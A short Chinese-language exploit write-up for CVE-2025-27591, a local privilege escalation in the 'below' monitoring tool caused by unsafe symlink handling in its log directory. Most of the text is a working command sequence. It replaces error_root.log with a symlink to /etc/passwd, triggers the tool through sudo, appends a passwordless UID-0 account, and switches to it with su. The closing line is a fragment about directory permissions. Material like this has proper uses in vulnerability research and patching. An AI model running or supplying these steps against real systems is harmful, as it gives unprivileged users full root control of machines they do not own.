CVE-2025-27591 是 below 工具(补丁发布之前的版本)中的一个本地权限提升漏洞,由日志机制中的不安全符号链接处理引起。具有本地访问权限的攻击者可以利用此漏洞以 root 用户身份覆盖任意文件,从而实现完全权限提升。
below 工具将日志写入 /var/log/below/,但未正确验证符号链接。通过预先创建指向敏感文件(例如 /etc/passwd)的符号链接,攻击者可以在易受攻击的进程通过 sudo 运行时,以提升的权限注入任意内容。
# 检查日志目录是否存在
test -d /var/log/below && ls -ld /var/log/below
# 删除现有日志文件并创建恶意符号链接
rm -f /var/log/below/error_root.log
ln -s /etc/passwd /var/log/below/error_root.log
# 准备恶意 passwd 条目
echo 'attacker::0:0:attacker:/root:/bin/bash' > /tmp/attacker
# 使用 sudo 触发易受攻击的行为
sudo /usr/bin/below record
echo 'attacker::0:0:attacker:/root:/bin/bash' >> /var/log/below/error_root.log
# 切换到新创建的具有 root 权限的用户
su attacker
成功利用此漏洞可使本地非特权攻击者获得 root 权限,从而完全控制整个系统。
/var/log/below/ 目录的访问权限。